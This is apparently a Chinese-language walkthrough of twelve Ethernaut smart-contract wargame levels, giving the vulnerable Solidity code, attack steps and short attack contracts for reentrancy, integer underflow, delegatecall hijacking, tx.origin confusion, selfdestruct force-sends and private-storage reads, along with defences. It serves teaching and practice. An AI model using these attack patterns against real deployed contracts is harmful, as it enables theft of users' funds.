Ethernaut智能合约攻防题解（2022版）<\/h1>

1. Fallback合约<\/h2>
合约漏洞<\/strong>：通过receive函数可篡改合约所有者<\/p>
关键代码<\/strong>：<\/p>
receive() external<\/span> payable<\/span> {
<\/span><\/span>    require(msg.value ><\/span> 0<\/span> &&<\/span> contributions[msg.sender] ><\/span> 0<\/span>);
<\/span><\/span>    owner =<\/span> msg.sender;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>攻击步骤<\/strong>：<\/p>

调用contribute()<\/code>存入少量ETH（contract.contribute({value:1})<\/code>）<\/li>
向合约地址转账1 ETH触发receive函数<\/li>
检查owner已变为攻击者地址<\/li>
调用withdraw()<\/code>提取合约余额<\/li>
<\/ol>
技术要点<\/strong>：<\/p>

receive函数在合约收到空calldata的转账时触发<\/li>
每个合约最多一个receive函数，声明方式为receive() external payable<\/code><\/li>
如果没有receive但有payable fallback，转账会触发fallback<\/li>
<\/ul>
2. Fallout合约<\/h2>
合约漏洞<\/strong>：构造函数拼写错误（Fal1out中的1）使其成为普通可调用函数<\/p>
攻击步骤<\/strong>：<\/p>

直接调用Fal1out()<\/code>函数<\/li>
调用collectAllocations()<\/code>提取资金<\/li>
<\/ol>
技术要点<\/strong>：<\/p>

构造函数应使用constructor<\/code>关键字或与合约同名<\/li>
拼写错误使构造函数变为普通函数，可被任意调用<\/li>
<\/ul>
3. CoinFlip合约<\/h2>
合约漏洞<\/strong>：使用区块哈希作为随机数源可被预测<\/p>
关键代码<\/strong>：<\/p>
uint256<\/span> blockValue =<\/span> uint256<\/span>(blockhash(block.number.sub(1<\/span>)));
<\/span><\/span>uint256<\/span> coinFlip =<\/span> blockValue.div(FACTOR);
<\/span><\/span><\/code><\/pre>攻击合约<\/strong>：<\/p>
contract<\/span> attack<\/span> {
<\/span><\/span>    function<\/span> exp<\/span>() public<\/span> {
<\/span><\/span>        uint256<\/span> blockValue =<\/span> uint256<\/span>(blockhash(block.number.sub(1<\/span>)));
<\/span><\/span>        bool<\/span> side =<\/span> blockValue.div(FACTOR) ==<\/span> 1<\/span>;
<\/span><\/span>        c.flip(side);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>技术要点<\/strong>：<\/p>

同一区块内的交易看到的block.number.sub(1)<\/code>相同<\/li>
攻击合约与目标合约在同一交易中可预测结果<\/li>
应在链下使用预言机提供随机数<\/li>
<\/ul>
4. Telephone合约<\/h2>
合约漏洞<\/strong>：混淆tx.origin<\/code>和msg.sender<\/code><\/p>
关键代码<\/strong>：<\/p>
if<\/span> (tx.origin !=<\/span> msg.sender) {
<\/span><\/span>    owner =<\/span> _owner;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>攻击步骤<\/strong>：<\/p>

部署攻击合约调用changeOwner()<\/code><\/li>
攻击合约中msg.sender<\/code>是攻击者，tx.origin<\/code>是用户<\/li>
<\/ol>
技术要点<\/strong>：<\/p>

tx.origin<\/code>是交易原始发起者<\/li>
msg.sender<\/code>是直接调用者<\/li>
调用链A→B→C中，对C来说：

tx.origin<\/code> = A<\/li>
msg.sender<\/code> = B<\/li>
<\/ul>
<\/li>
<\/ul>
5. Token合约<\/h2>
合约漏洞<\/strong>：整数下溢<\/p>
关键代码<\/strong>：<\/p>
require(balances[msg.sender] -<\/span> _value >=<\/span> 0<\/span>);
<\/span><\/span>balances[msg.sender] -=<\/span> _value;
<\/span><\/span><\/code><\/pre>攻击步骤<\/strong>：<\/p>

初始有20 token<\/li>
调用transfer(instance,21)<\/code>触发下溢<\/li>
balances[msg.sender]<\/code>变为极大值<\/li>
<\/ol>
技术要点<\/strong>：<\/p>

Solidity 0.8+默认检查算术溢出<\/li>
旧版本需使用SafeMath库<\/li>
下溢后uint值变为\(2^{256}-1\)<\/span><\/li>
<\/ul>
6. Delegation合约<\/h2>
合约漏洞<\/strong>：delegatecall使用不当<\/p>
关键代码<\/strong>：<\/p>
(bool<\/span> result,) =<\/span> address<\/span>(delegate).delegatecall(msg.data);
<\/span><\/span><\/code><\/pre>攻击步骤<\/strong>：<\/p>
contract<\/span>.sendTransaction<\/span>({
<\/span><\/span>    data<\/span>:<\/span> web3<\/span>.utils<\/span>.sha3<\/span>("pwn()"<\/span>).slice<\/span>(0<\/span>,10<\/span>)
<\/span><\/span>});
<\/span><\/span><\/code><\/pre>技术要点<\/strong>：<\/p>

delegatecall<\/code>保持调用者上下文<\/li>
函数选择器是函数签名keccak256的前4字节<\/li>
三种调用方式区别：

call<\/code>：在目标合约上下文执行<\/li>
delegatecall<\/code>：在调用者上下文执行<\/li>
staticcall<\/code>：只读的call<\/code><\/li>
<\/ul>
<\/li>
<\/ul>
7. Force合约<\/h2>
合约漏洞<\/strong>：空合约接收ETH<\/p>
攻击方法<\/strong>：使用selfdestruct<\/code>强制转账<\/p>
攻击合约<\/strong>：<\/p>
contract<\/span> Attack<\/span> {
<\/span><\/span>    function<\/span> exploit<\/span>(address<\/span> payable<\/span> _target) public<\/span> payable<\/span> {
<\/span><\/span>        selfdestruct(_target);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>技术要点<\/strong>：<\/p>

selfdestruct<\/code>强制转账无视合约fallback<\/li>
合约即使没有payable函数也能接收ETH<\/li>
资金发送优先级高于常规转账<\/li>
<\/ul>
8. Vault合约<\/h2>
合约漏洞<\/strong>：私有变量可读取<\/p>
攻击步骤<\/strong>：<\/p>
await<\/span> web3<\/span>.eth<\/span>.getStorageAt<\/span>(contract<\/span>.address<\/span>,1<\/span>)
<\/span><\/span>await<\/span> contract<\/span>.unlock<\/span>("0x..."<\/span>)
<\/span><\/span><\/code><\/pre>技术要点<\/strong>：<\/p>

合约所有数据在链上公开<\/li>
私有变量仅限制合约内访问<\/li>
存储布局：

slot 0: locked<\/li>
slot 1: password<\/li>
<\/ul>
<\/li>
字符串需转换为bytes32<\/li>
<\/ul>
9. King合约<\/h2>
合约漏洞<\/strong>：未处理转账失败<\/p>
关键代码<\/strong>：<\/p>
king.transfer(msg.value);
<\/span><\/span>king =<\/span> msg.sender;
<\/span><\/span><\/code><\/pre>攻击合约<\/strong>：<\/p>
contract<\/span> AttackKing<\/span> {
<\/span><\/span>    receive() external<\/span> payable<\/span> { revert(); }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>技术要点<\/strong>：<\/p>

攻击合约拒绝接收转账使流程中断<\/li>
应使用"检查-生效-交互"模式<\/li>
三种转账方式：

transfer<\/code>：失败revert，gas限制2300<\/li>
send<\/code>：返回false，gas限制2300<\/li>
call<\/code>：无gas限制，需手动处理结果<\/li>
<\/ul>
<\/li>
<\/ul>
10. Re-entrancy合约<\/h2>
合约漏洞<\/strong>：重入攻击<\/p>
关键代码<\/strong>：<\/p>
(bool<\/span> result,) =<\/span> msg.sender.call{value:<\/span>_amount}(""<\/span>);
<\/span><\/span>balances[msg.sender] -=<\/span> _amount;
<\/span><\/span><\/code><\/pre>攻击合约<\/strong>：<\/p>
fallback() external<\/span> payable<\/span> {
<\/span><\/span>    target.call(abi.encodeWithSignature("withdraw(uint256)"<\/span>,amount));
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>技术要点<\/strong>：<\/p>

先转账后更新余额<\/li>
call无gas限制允许复杂操作<\/li>
防御措施：

使用Checks-Effects-Interactions模式<\/li>
添加重入锁<\/li>
使用transfer\/send限制gas<\/li>
<\/ol>
<\/li>
<\/ul>
11. Elevator合约<\/h2>
合约漏洞<\/strong>：接口函数返回值不一致<\/p>
关键代码<\/strong>：<\/p>
if<\/span> (!<\/span>building.isLastFloor(_floor)) {
<\/span><\/span>    top =<\/span> building.isLastFloor(floor);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>攻击合约<\/strong>：<\/p>
function<\/span> isLastFloor<\/span>(uint<\/span>) external<\/span> returns<\/span> (bool<\/span>){
<\/span><\/span>    x =<\/span> !<\/span>x;
<\/span><\/span>    return<\/span> x;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>技术要点<\/strong>：<\/p>

同一函数两次调用返回不同值<\/li>
接口实现可包含状态变更<\/li>
应使用view\/pure修饰符限制函数行为<\/li>
<\/ul>
12. Privacy合约<\/h2>
合约漏洞<\/strong>：存储数据可读取<\/p>
攻击步骤<\/strong>：<\/p>
await<\/span> web3<\/span>.eth<\/span>.getStorageAt<\/span>(instance<\/span>, 5<\/span>)
<\/span><\/span>await<\/span> contract<\/span>.unlock<\/span>('0x...'<\/span>)
<\/span><\/span><\/code><\/pre>存储布局<\/strong>：<\/p>
slot 0: locked (1 byte) + unused (31 bytes)
slot 1: ID (32 bytes)
slot 2: flattening (1 byte) + denomination (1 byte) + awkwardness (2 byte) + unused (28 bytes)
slot 3: data[0] (32 bytes)
slot 4: data[1] (32 bytes)
slot 5: data[2] (32 bytes)
<\/code><\/pre>
技术要点<\/strong>：<\/p>

bytes16从高地址截取<\/li>
静态数组元素连续存储<\/li>
动态数组使用keccak256(slot)作为起始位置<\/li>
<\/ul>